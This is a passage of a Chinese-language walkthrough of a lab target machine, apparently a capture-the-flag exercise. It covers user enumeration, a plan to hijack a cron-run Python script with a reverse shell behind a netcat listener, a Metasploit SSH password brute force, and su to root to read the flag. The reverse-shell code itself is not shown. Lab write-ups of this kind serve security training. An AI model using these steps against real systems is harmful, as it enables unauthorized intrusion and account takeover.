whoami//查看当前用户 id//查看当前用户权限 cd /home//进入家目录 ls //查看有哪些用户,发现除了martin,还有jimmy 和hadi cd /root//查看根目录 寻找flag文件,如果是root权限,那么表明该靶场被全部拿下。但是如果不是,就肯定要提权,一般情况下,flag文件只属于root用户和对应的用户组。此时发现martin不是root权限,需要进一步提权。
五、提权(root)
提权方式1:利用计划任务 在martin用户下
cat /etc/crontab//查看martin用户下的定时任务,发现该用户没有定时任务,但是jimmy用户tmp目录下有sekurity.py定时任务,那么我们可以创建同名反弹shell,然后nc 执行监听来获取jimmy用户的权限,进而可以查看jimmy用户是否有root权限。 nc -nlvp 4445//先打开nc监听。netstat -pantu命令可以查看已占用端口。 cd /tmp//进入martin用户缓冲文件目录 touch 1.py//创建临时1.py文件,写反弹shell vi 1.py//进入编辑模式,按i键进入输入模式,输入以下代码(仔细输入,输错麻烦,ctrl+方向键 进入上下行 编辑完成esc键,再:wq键保存退出
msfconsole//启动metasploit的msfconsole模式 use auxiliary/scanner/ssh/ssh_login//使用该payload show options set rhosts 192.168.56.103//设置靶机IP set username hadi set pass_file /root/common-password/hadi.txt set verbose true//显示爆破过程 set threads 5//设置线程为5 等待破解完成,非常慢 破解密码为hadi123
back//重新设置 use auxiliary/scanner/ssh/ssh_login//使用该payload show options set rhosts 192.168.56.103//设置靶机IP set username hadi set password hadi123 run sessions -i 1//
python -c “import pty;pty.spawn(’/bin/bash’)”//优化会话窗口 su - root//因为知道hadi用户密码,所以尝试通过su命令进入root hadi123//输入密码 id cd /root ls -alh cat flag.txt 完成!